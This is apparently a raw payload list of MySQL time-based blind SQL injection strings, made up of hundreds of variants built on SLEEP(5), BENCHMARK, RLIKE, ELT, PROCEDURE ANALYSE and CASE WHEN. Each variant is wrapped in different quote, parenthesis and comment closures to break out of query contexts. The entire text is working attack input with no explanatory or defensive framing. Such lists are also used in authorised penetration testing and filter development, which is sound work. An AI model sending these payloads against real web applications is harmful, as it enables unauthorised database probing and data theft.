1) AND (SELECT 7986 FROM (SELECT(SLEEP(5)))sqhm)-- MaDp
) AND (SELECT 7986 FROM (SELECT(SLEEP(5)))sqhm) AND (3310=3310
)) AND (SELECT 7986 FROM (SELECT(SLEEP(5)))sqhm) AND ((5405=5405
))) AND (SELECT 7986 FROM (SELECT(SLEEP(5)))sqhm) AND (((6492=6492
 AND (SELECT 7986 FROM (SELECT(SLEEP(5)))sqhm)
 AND (SELECT 7986 FROM (SELECT(SLEEP(5)))sqhm)-- hWwL
 AND (SELECT 7986 FROM (SELECT(SLEEP(5)))sqhm)# qRap
' AND (SELECT 7986 FROM (SELECT(SLEEP(5)))sqhm)-- JLWM
') AND (SELECT 7986 FROM (SELECT(SLEEP(5)))sqhm) AND ('gLhz'='gLhz
')) AND (SELECT 7986 FROM (SELECT(SLEEP(5)))sqhm) AND (('tmJw'='tmJw
'))) AND (SELECT 7986 FROM (SELECT(SLEEP(5)))sqhm) AND ((('krRJ'='krRJ
' AND (SELECT 7986 FROM (SELECT(SLEEP(5)))sqhm) AND 'ePaJ'='ePaJ
') AND (SELECT 7986 FROM (SELECT(SLEEP(5)))sqhm) AND ('nSPF' LIKE 'nSPF
')) AND (SELECT 7986 FROM (SELECT(SLEEP(5)))sqhm) AND (('YiJN' LIKE 'YiJN
%' AND (SELECT 7986 FROM (SELECT(SLEEP(5)))sqhm) AND 'SgOL%'='SgOL
' AND (SELECT 7986 FROM (SELECT(SLEEP(5)))sqhm) AND 'KiAX' LIKE 'KiAX
") AND (SELECT 7986 FROM (SELECT(SLEEP(5)))sqhm) AND ("bDiv"="bDiv
")) AND (SELECT 7986 FROM (SELECT(SLEEP(5)))sqhm) AND (("zohe"="zohe
" AND (SELECT 7986 FROM (SELECT(SLEEP(5)))sqhm) AND "rnjD"="rnjD
") AND (SELECT 7986 FROM (SELECT(SLEEP(5)))sqhm) AND ("ZOsG" LIKE "ZOsG
" AND (SELECT 7986 FROM (SELECT(SLEEP(5)))sqhm) AND "krof" LIKE "krof
' AND (SELECT 7986 FROM (SELECT(SLEEP(5)))sqhm) OR 'kdRl'='ploJ
) OR (SELECT 4063 FROM (SELECT(SLEEP(5)))ZHyn)-- MSDK
) OR (SELECT 4063 FROM (SELECT(SLEEP(5)))ZHyn) AND (9258=9258
)) OR (SELECT 4063 FROM (SELECT(SLEEP(5)))ZHyn) AND ((3750=3750
))) OR (SELECT 4063 FROM (SELECT(SLEEP(5)))ZHyn) AND (((8290=8290
 OR (SELECT 4063 FROM (SELECT(SLEEP(5)))ZHyn)
 OR (SELECT 4063 FROM (SELECT(SLEEP(5)))ZHyn)-- vPPX
 OR (SELECT 4063 FROM (SELECT(SLEEP(5)))ZHyn)# kvyH
' OR (SELECT 4063 FROM (SELECT(SLEEP(5)))ZHyn)-- ESjz
') OR (SELECT 4063 FROM (SELECT(SLEEP(5)))ZHyn) AND ('dbIB'='dbIB
')) OR (SELECT 4063 FROM (SELECT(SLEEP(5)))ZHyn) AND (('Arkp'='Arkp
'))) OR (SELECT 4063 FROM (SELECT(SLEEP(5)))ZHyn) AND ((('wEIt'='wEIt
' OR (SELECT 4063 FROM (SELECT(SLEEP(5)))ZHyn) AND 'WjZi'='WjZi
') OR (SELECT 4063 FROM (SELECT(SLEEP(5)))ZHyn) AND ('fLzP' LIKE 'fLzP
')) OR (SELECT 4063 FROM (SELECT(SLEEP(5)))ZHyn) AND (('jaYl' LIKE 'jaYl
%' OR (SELECT 4063 FROM (SELECT(SLEEP(5)))ZHyn) AND 'wDTh%'='wDTh
' OR (SELECT 4063 FROM (SELECT(SLEEP(5)))ZHyn) AND 'Gzee' LIKE 'Gzee
") OR (SELECT 4063 FROM (SELECT(SLEEP(5)))ZHyn) AND ("IupD"="IupD
")) OR (SELECT 4063 FROM (SELECT(SLEEP(5)))ZHyn) AND (("ZnUB"="ZnUB
" OR (SELECT 4063 FROM (SELECT(SLEEP(5)))ZHyn) AND "ntJj"="ntJj
") OR (SELECT 4063 FROM (SELECT(SLEEP(5)))ZHyn) AND ("gSkd" LIKE "gSkd
" OR (SELECT 4063 FROM (SELECT(SLEEP(5)))ZHyn) AND "tPKS" LIKE "tPKS
' OR (SELECT 4063 FROM (SELECT(SLEEP(5)))ZHyn) OR 'MAPo'='Hzht
) AND SLEEP(5)-- jJKP
) AND SLEEP(5) AND (6019=6019
)) AND SLEEP(5) AND ((2839=2839
))) AND SLEEP(5) AND (((5282=5282
 AND SLEEP(5)
 AND SLEEP(5)-- bhXT
 AND SLEEP(5)# Cnds
' AND SLEEP(5)-- xZOt
') AND SLEEP(5) AND ('DugN'='DugN
')) AND SLEEP(5) AND (('rkvg'='rkvg
'))) AND SLEEP(5) AND ((('ucoV'='ucoV
' AND SLEEP(5) AND 'JIKt'='JIKt
') AND SLEEP(5) AND ('hbbY' LIKE 'hbbY
')) AND SLEEP(5) AND (('MgfA' LIKE 'MgfA
%' AND SLEEP(5) AND 'whUa%'='whUa
' AND SLEEP(5) AND 'JEDA' LIKE 'JEDA
") AND SLEEP(5) AND ("JLhl"="JLhl
")) AND SLEEP(5) AND (("Mxia"="Mxia
" AND SLEEP(5) AND "KPkt"="KPkt
") AND SLEEP(5) AND ("gXQL" LIKE "gXQL
" AND SLEEP(5) AND "WDJf" LIKE "WDJf
' AND SLEEP(5) OR 'Equa'='RRqG
) OR SLEEP(5)-- PIue
) OR SLEEP(5) AND (5272=5272
)) OR SLEEP(5) AND ((6974=6974
))) OR SLEEP(5) AND (((7130=7130
 OR SLEEP(5)
 OR SLEEP(5)-- fvQn
 OR SLEEP(5)# KilK
' OR SLEEP(5)-- IRUJ
') OR SLEEP(5) AND ('rZkj'='rZkj
')) OR SLEEP(5) AND (('TrNQ'='TrNQ
'))) OR SLEEP(5) AND ((('dLNI'='dLNI
' OR SLEEP(5) AND 'RLlr'='RLlr
') OR SLEEP(5) AND ('GvTE' LIKE 'GvTE
')) OR SLEEP(5) AND (('gCev' LIKE 'gCev
%' OR SLEEP(5) AND 'pcjX%'='pcjX
' OR SLEEP(5) AND 'ObmV' LIKE 'ObmV
") OR SLEEP(5) AND ("ANXS"="ANXS
")) OR SLEEP(5) AND (("aLYk"="aLYk
" OR SLEEP(5) AND "SlNL"="SlNL
") OR SLEEP(5) AND ("PBGF" LIKE "PBGF
" OR SLEEP(5) AND "bBna" LIKE "bBna
' OR SLEEP(5) OR 'rJwg'='VQpx
) AND SLEEP(5)#
)) AND SLEEP(5)#
))) AND SLEEP(5)#
 AND SLEEP(5)#
' AND SLEEP(5)#
') AND SLEEP(5)#
')) AND SLEEP(5)#
'))) AND SLEEP(5)#
%' AND SLEEP(5)#
") AND SLEEP(5)#
")) AND SLEEP(5)#
" AND SLEEP(5)#
) OR SLEEP(5)#
)) OR SLEEP(5)#
))) OR SLEEP(5)#
 OR SLEEP(5)#
' OR SLEEP(5)#
') OR SLEEP(5)#
')) OR SLEEP(5)#
'))) OR SLEEP(5)#
%' OR SLEEP(5)#
") OR SLEEP(5)#
")) OR SLEEP(5)#
" OR SLEEP(5)#
) AND (SELECT 3899 FROM (SELECT(SLEEP(5)))ajCq)#
)) AND (SELECT 3899 FROM (SELECT(SLEEP(5)))ajCq)#
))) AND (SELECT 3899 FROM (SELECT(SLEEP(5)))ajCq)#
 AND (SELECT 3899 FROM (SELECT(SLEEP(5)))ajCq)#
' AND (SELECT 3899 FROM (SELECT(SLEEP(5)))ajCq)#
') AND (SELECT 3899 FROM (SELECT(SLEEP(5)))ajCq)#
')) AND (SELECT 3899 FROM (SELECT(SLEEP(5)))ajCq)#
'))) AND (SELECT 3899 FROM (SELECT(SLEEP(5)))ajCq)#
%' AND (SELECT 3899 FROM (SELECT(SLEEP(5)))ajCq)#
") AND (SELECT 3899 FROM (SELECT(SLEEP(5)))ajCq)#
")) AND (SELECT 3899 FROM (SELECT(SLEEP(5)))ajCq)#
" AND (SELECT 3899 FROM (SELECT(SLEEP(5)))ajCq)#
) OR (SELECT 7711 FROM (SELECT(SLEEP(5)))gAuG)#
)) OR (SELECT 7711 FROM (SELECT(SLEEP(5)))gAuG)#
))) OR (SELECT 7711 FROM (SELECT(SLEEP(5)))gAuG)#
 OR (SELECT 7711 FROM (SELECT(SLEEP(5)))gAuG)#
' OR (SELECT 7711 FROM (SELECT(SLEEP(5)))gAuG)#
') OR (SELECT 7711 FROM (SELECT(SLEEP(5)))gAuG)#
')) OR (SELECT 7711 FROM (SELECT(SLEEP(5)))gAuG)#
'))) OR (SELECT 7711 FROM (SELECT(SLEEP(5)))gAuG)#
%' OR (SELECT 7711 FROM (SELECT(SLEEP(5)))gAuG)#
") OR (SELECT 7711 FROM (SELECT(SLEEP(5)))gAuG)#
")) OR (SELECT 7711 FROM (SELECT(SLEEP(5)))gAuG)#
" OR (SELECT 7711 FROM (SELECT(SLEEP(5)))gAuG)#
) AND 2016=BENCHMARK(5000000,MD5(0x79477551))-- unfN
) AND 2016=BENCHMARK(5000000,MD5(0x79477551)) AND (2820=2820
)) AND 2016=BENCHMARK(5000000,MD5(0x79477551)) AND ((5338=5338
))) AND 2016=BENCHMARK(5000000,MD5(0x79477551)) AND (((6394=6394
 AND 2016=BENCHMARK(5000000,MD5(0x79477551))
 AND 2016=BENCHMARK(5000000,MD5(0x79477551))-- gGPC
 AND 2016=BENCHMARK(5000000,MD5(0x79477551))# EEpl
' AND 2016=BENCHMARK(5000000,MD5(0x79477551))-- jnHY
') AND 2016=BENCHMARK(5000000,MD5(0x79477551)) AND ('DuEO'='DuEO
')) AND 2016=BENCHMARK(5000000,MD5(0x79477551)) AND (('jBht'='jBht
'))) AND 2016=BENCHMARK(5000000,MD5(0x79477551)) AND ((('AWHK'='AWHK
' AND 2016=BENCHMARK(5000000,MD5(0x79477551)) AND 'ZuBQ'='ZuBQ
') AND 2016=BENCHMARK(5000000,MD5(0x79477551)) AND ('SvXf' LIKE 'SvXf
')) AND 2016=BENCHMARK(5000000,MD5(0x79477551)) AND (('fLxu' LIKE 'fLxu
%' AND 2016=BENCHMARK(5000000,MD5(0x79477551)) AND 'GfyQ%'='GfyQ
' AND 2016=BENCHMARK(5000000,MD5(0x79477551)) AND 'jCHc' LIKE 'jCHc
") AND 2016=BENCHMARK(5000000,MD5(0x79477551)) AND ("ZuKL"="ZuKL
")) AND 2016=BENCHMARK(5000000,MD5(0x79477551)) AND (("FyBt"="FyBt
" AND 2016=BENCHMARK(5000000,MD5(0x79477551)) AND "cmJt"="cmJt
") AND 2016=BENCHMARK(5000000,MD5(0x79477551)) AND ("uOru" LIKE "uOru
" AND 2016=BENCHMARK(5000000,MD5(0x79477551)) AND "HSGb" LIKE "HSGb
' AND 2016=BENCHMARK(5000000,MD5(0x79477551)) OR 'ccgZ'='Ojxn
) OR 9212=BENCHMARK(5000000,MD5(0x57685750))-- AFkq
) OR 9212=BENCHMARK(5000000,MD5(0x57685750)) AND (2438=2438
)) OR 9212=BENCHMARK(5000000,MD5(0x57685750)) AND ((8892=8892
))) OR 9212=BENCHMARK(5000000,MD5(0x57685750)) AND (((9379=9379
 OR 9212=BENCHMARK(5000000,MD5(0x57685750))
 OR 9212=BENCHMARK(5000000,MD5(0x57685750))-- alUI
 OR 9212=BENCHMARK(5000000,MD5(0x57685750))# ODgw
' OR 9212=BENCHMARK(5000000,MD5(0x57685750))-- fxLc
') OR 9212=BENCHMARK(5000000,MD5(0x57685750)) AND ('QREV'='QREV
')) OR 9212=BENCHMARK(5000000,MD5(0x57685750)) AND (('Flal'='Flal
'))) OR 9212=BENCHMARK(5000000,MD5(0x57685750)) AND ((('pnjr'='pnjr
' OR 9212=BENCHMARK(5000000,MD5(0x57685750)) AND 'UILG'='UILG
') OR 9212=BENCHMARK(5000000,MD5(0x57685750)) AND ('zJEa' LIKE 'zJEa
')) OR 9212=BENCHMARK(5000000,MD5(0x57685750)) AND (('nBrE' LIKE 'nBrE
%' OR 9212=BENCHMARK(5000000,MD5(0x57685750)) AND 'yrjR%'='yrjR
' OR 9212=BENCHMARK(5000000,MD5(0x57685750)) AND 'mXYc' LIKE 'mXYc
") OR 9212=BENCHMARK(5000000,MD5(0x57685750)) AND ("woyc"="woyc
")) OR 9212=BENCHMARK(5000000,MD5(0x57685750)) AND (("KjOo"="KjOo
" OR 9212=BENCHMARK(5000000,MD5(0x57685750)) AND "fByf"="fByf
") OR 9212=BENCHMARK(5000000,MD5(0x57685750)) AND ("mTqR" LIKE "mTqR
" OR 9212=BENCHMARK(5000000,MD5(0x57685750)) AND "ELSh" LIKE "ELSh
' OR 9212=BENCHMARK(5000000,MD5(0x57685750)) OR 'BVUQ'='qmTP
) RLIKE SLEEP(5)-- dkoJ
) RLIKE SLEEP(5) AND (4979=4979
)) RLIKE SLEEP(5) AND ((6481=6481
))) RLIKE SLEEP(5) AND (((1992=1992
 RLIKE SLEEP(5)
 RLIKE SLEEP(5)-- IPWk
 RLIKE SLEEP(5)# XZAM
' RLIKE SLEEP(5)-- dUCE
') RLIKE SLEEP(5) AND ('QVGb'='QVGb
')) RLIKE SLEEP(5) AND (('mjii'='mjii
'))) RLIKE SLEEP(5) AND ((('UDGr'='UDGr
' RLIKE SLEEP(5) AND 'zAVv'='zAVv
') RLIKE SLEEP(5) AND ('cJQC' LIKE 'cJQC
')) RLIKE SLEEP(5) AND (('SKWO' LIKE 'SKWO
%' RLIKE SLEEP(5) AND 'yaTF%'='yaTF
' RLIKE SLEEP(5) AND 'afjz' LIKE 'afjz
") RLIKE SLEEP(5) AND ("nYNO"="nYNO
")) RLIKE SLEEP(5) AND (("shew"="shew
" RLIKE SLEEP(5) AND "TgmE"="TgmE
") RLIKE SLEEP(5) AND ("ctZm" LIKE "ctZm
" RLIKE SLEEP(5) AND "ybhW" LIKE "ybhW
' RLIKE SLEEP(5) OR 'Vqoo'='rwwD
) RLIKE (SELECT 7659 FROM (SELECT(SLEEP(5)))mfcC)-- AHEO
) RLIKE (SELECT 7659 FROM (SELECT(SLEEP(5)))mfcC) AND (7048=7048
)) RLIKE (SELECT 7659 FROM (SELECT(SLEEP(5)))mfcC) AND ((6416=6416
))) RLIKE (SELECT 7659 FROM (SELECT(SLEEP(5)))mfcC) AND (((9864=9864
 RLIKE (SELECT 7659 FROM (SELECT(SLEEP(5)))mfcC)
 RLIKE (SELECT 7659 FROM (SELECT(SLEEP(5)))mfcC)-- RhIR
 RLIKE (SELECT 7659 FROM (SELECT(SLEEP(5)))mfcC)# LCgQ
' RLIKE (SELECT 7659 FROM (SELECT(SLEEP(5)))mfcC)-- xtgP
') RLIKE (SELECT 7659 FROM (SELECT(SLEEP(5)))mfcC) AND ('wFVC'='wFVC
')) RLIKE (SELECT 7659 FROM (SELECT(SLEEP(5)))mfcC) AND (('iDcM'='iDcM
'))) RLIKE (SELECT 7659 FROM (SELECT(SLEEP(5)))mfcC) AND ((('YIGJ'='YIGJ
' RLIKE (SELECT 7659 FROM (SELECT(SLEEP(5)))mfcC) AND 'gGAu'='gGAu
') RLIKE (SELECT 7659 FROM (SELECT(SLEEP(5)))mfcC) AND ('lgnP' LIKE 'lgnP
')) RLIKE (SELECT 7659 FROM (SELECT(SLEEP(5)))mfcC) AND (('jMdh' LIKE 'jMdh
%' RLIKE (SELECT 7659 FROM (SELECT(SLEEP(5)))mfcC) AND 'CAGD%'='CAGD
' RLIKE (SELECT 7659 FROM (SELECT(SLEEP(5)))mfcC) AND 'zJns' LIKE 'zJns
") RLIKE (SELECT 7659 FROM (SELECT(SLEEP(5)))mfcC) AND ("rTuE"="rTuE
")) RLIKE (SELECT 7659 FROM (SELECT(SLEEP(5)))mfcC) AND (("wnnX"="wnnX
" RLIKE (SELECT 7659 FROM (SELECT(SLEEP(5)))mfcC) AND "TpVD"="TpVD
") RLIKE (SELECT 7659 FROM (SELECT(SLEEP(5)))mfcC) AND ("Rcjk" LIKE "Rcjk
" RLIKE (SELECT 7659 FROM (SELECT(SLEEP(5)))mfcC) AND "pRxj" LIKE "pRxj
' RLIKE (SELECT 7659 FROM (SELECT(SLEEP(5)))mfcC) OR 'XxjB'='bigT
) AND ELT(8634=8634,SLEEP(5))-- hQBm
) AND ELT(8634=8634,SLEEP(5)) AND (4394=4394
)) AND ELT(8634=8634,SLEEP(5)) AND ((2615=2615
))) AND ELT(8634=8634,SLEEP(5)) AND (((2559=2559
 AND ELT(8634=8634,SLEEP(5))
 AND ELT(8634=8634,SLEEP(5))-- Prbu
 AND ELT(8634=8634,SLEEP(5))# xZuM
' AND ELT(8634=8634,SLEEP(5))-- AxAQ
') AND ELT(8634=8634,SLEEP(5)) AND ('aoTX'='aoTX
')) AND ELT(8634=8634,SLEEP(5)) AND (('Uyhw'='Uyhw
'))) AND ELT(8634=8634,SLEEP(5)) AND ((('ORGC'='ORGC
' AND ELT(8634=8634,SLEEP(5)) AND 'FnFJ'='FnFJ
') AND ELT(8634=8634,SLEEP(5)) AND ('hlIe' LIKE 'hlIe
')) AND ELT(8634=8634,SLEEP(5)) AND (('qsOI' LIKE 'qsOI
%' AND ELT(8634=8634,SLEEP(5)) AND 'UhdM%'='UhdM
' AND ELT(8634=8634,SLEEP(5)) AND 'pwsi' LIKE 'pwsi
") AND ELT(8634=8634,SLEEP(5)) AND ("ECmt"="ECmt
")) AND ELT(8634=8634,SLEEP(5)) AND (("fpVX"="fpVX
" AND ELT(8634=8634,SLEEP(5)) AND "Mcpc"="Mcpc
") AND ELT(8634=8634,SLEEP(5)) AND ("gtRq" LIKE "gtRq
" AND ELT(8634=8634,SLEEP(5)) AND "iPjz" LIKE "iPjz
' AND ELT(8634=8634,SLEEP(5)) OR 'NIoE'='pjjI
) OR ELT(7866=7866,SLEEP(5))-- ydvb
) OR ELT(7866=7866,SLEEP(5)) AND (2468=2468
)) OR ELT(7866=7866,SLEEP(5)) AND ((7556=7556
))) OR ELT(7866=7866,SLEEP(5)) AND (((3391=3391
 OR ELT(7866=7866,SLEEP(5))
 OR ELT(7866=7866,SLEEP(5))-- cAuL
 OR ELT(7866=7866,SLEEP(5))# LWHs
' OR ELT(7866=7866,SLEEP(5))-- WBSs
') OR ELT(7866=7866,SLEEP(5)) AND ('FExs'='FExs
')) OR ELT(7866=7866,SLEEP(5)) AND (('dBmR'='dBmR
'))) OR ELT(7866=7866,SLEEP(5)) AND ((('licu'='licu
' OR ELT(7866=7866,SLEEP(5)) AND 'kaFp'='kaFp
') OR ELT(7866=7866,SLEEP(5)) AND ('oWDk' LIKE 'oWDk
')) OR ELT(7866=7866,SLEEP(5)) AND (('cGpv' LIKE 'cGpv
%' OR ELT(7866=7866,SLEEP(5)) AND 'dusT%'='dusT
' OR ELT(7866=7866,SLEEP(5)) AND 'JGWo' LIKE 'JGWo
") OR ELT(7866=7866,SLEEP(5)) AND ("oggR"="oggR
")) OR ELT(7866=7866,SLEEP(5)) AND (("eLeg"="eLeg
" OR ELT(7866=7866,SLEEP(5)) AND "aGAP"="aGAP
") OR ELT(7866=7866,SLEEP(5)) AND ("qJgD" LIKE "qJgD
" OR ELT(7866=7866,SLEEP(5)) AND "KpDM" LIKE "KpDM
' OR ELT(7866=7866,SLEEP(5)) OR 'UJZx'='Tudf
) PROCEDURE ANALYSE(EXTRACTVALUE(3500,CONCAT(0x5c,(BENCHMARK(5000000,MD5(0x43677557))))),1)-- kOoF
) PROCEDURE ANALYSE(EXTRACTVALUE(3500,CONCAT(0x5c,(BENCHMARK(5000000,MD5(0x43677557))))),1) AND (1364=1364
)) PROCEDURE ANALYSE(EXTRACTVALUE(3500,CONCAT(0x5c,(BENCHMARK(5000000,MD5(0x43677557))))),1) AND ((3995=3995
))) PROCEDURE ANALYSE(EXTRACTVALUE(3500,CONCAT(0x5c,(BENCHMARK(5000000,MD5(0x43677557))))),1) AND (((9334=9334
 PROCEDURE ANALYSE(EXTRACTVALUE(3500,CONCAT(0x5c,(BENCHMARK(5000000,MD5(0x43677557))))),1)
 PROCEDURE ANALYSE(EXTRACTVALUE(3500,CONCAT(0x5c,(BENCHMARK(5000000,MD5(0x43677557))))),1)-- HRMl
 PROCEDURE ANALYSE(EXTRACTVALUE(3500,CONCAT(0x5c,(BENCHMARK(5000000,MD5(0x43677557))))),1)# ftEu
' PROCEDURE ANALYSE(EXTRACTVALUE(3500,CONCAT(0x5c,(BENCHMARK(5000000,MD5(0x43677557))))),1)-- Mssi
') PROCEDURE ANALYSE(EXTRACTVALUE(3500,CONCAT(0x5c,(BENCHMARK(5000000,MD5(0x43677557))))),1) AND ('vvvR'='vvvR
')) PROCEDURE ANALYSE(EXTRACTVALUE(3500,CONCAT(0x5c,(BENCHMARK(5000000,MD5(0x43677557))))),1) AND (('JynS'='JynS
'))) PROCEDURE ANALYSE(EXTRACTVALUE(3500,CONCAT(0x5c,(BENCHMARK(5000000,MD5(0x43677557))))),1) AND ((('JyQD'='JyQD
' PROCEDURE ANALYSE(EXTRACTVALUE(3500,CONCAT(0x5c,(BENCHMARK(5000000,MD5(0x43677557))))),1) AND 'EDYe'='EDYe
') PROCEDURE ANALYSE(EXTRACTVALUE(3500,CONCAT(0x5c,(BENCHMARK(5000000,MD5(0x43677557))))),1) AND ('wldU' LIKE 'wldU
')) PROCEDURE ANALYSE(EXTRACTVALUE(3500,CONCAT(0x5c,(BENCHMARK(5000000,MD5(0x43677557))))),1) AND (('BdYO' LIKE 'BdYO
%' PROCEDURE ANALYSE(EXTRACTVALUE(3500,CONCAT(0x5c,(BENCHMARK(5000000,MD5(0x43677557))))),1) AND 'RKhR%'='RKhR
' PROCEDURE ANALYSE(EXTRACTVALUE(3500,CONCAT(0x5c,(BENCHMARK(5000000,MD5(0x43677557))))),1) AND 'bEqr' LIKE 'bEqr
") PROCEDURE ANALYSE(EXTRACTVALUE(3500,CONCAT(0x5c,(BENCHMARK(5000000,MD5(0x43677557))))),1) AND ("yuTj"="yuTj
")) PROCEDURE ANALYSE(EXTRACTVALUE(3500,CONCAT(0x5c,(BENCHMARK(5000000,MD5(0x43677557))))),1) AND (("WddZ"="WddZ
" PROCEDURE ANALYSE(EXTRACTVALUE(3500,CONCAT(0x5c,(BENCHMARK(5000000,MD5(0x43677557))))),1) AND "ohEt"="ohEt
") PROCEDURE ANALYSE(EXTRACTVALUE(3500,CONCAT(0x5c,(BENCHMARK(5000000,MD5(0x43677557))))),1) AND ("npVQ" LIKE "npVQ
" PROCEDURE ANALYSE(EXTRACTVALUE(3500,CONCAT(0x5c,(BENCHMARK(5000000,MD5(0x43677557))))),1) AND "VvbT" LIKE "VvbT
' PROCEDURE ANALYSE(EXTRACTVALUE(3500,CONCAT(0x5c,(BENCHMARK(5000000,MD5(0x43677557))))),1) OR 'sutl'='NQQF
(CASE WHEN (7244=7244) THEN SLEEP(5) ELSE 7244 END)
(SELECT 6389 FROM (SELECT(SLEEP(5)))KeDv)
,(SELECT (CASE WHEN (3025=3025) THEN SLEEP(5) ELSE 3025 END))
',(SELECT (CASE WHEN (3025=3025) THEN SLEEP(5) ELSE 3025 END))-- tyVT
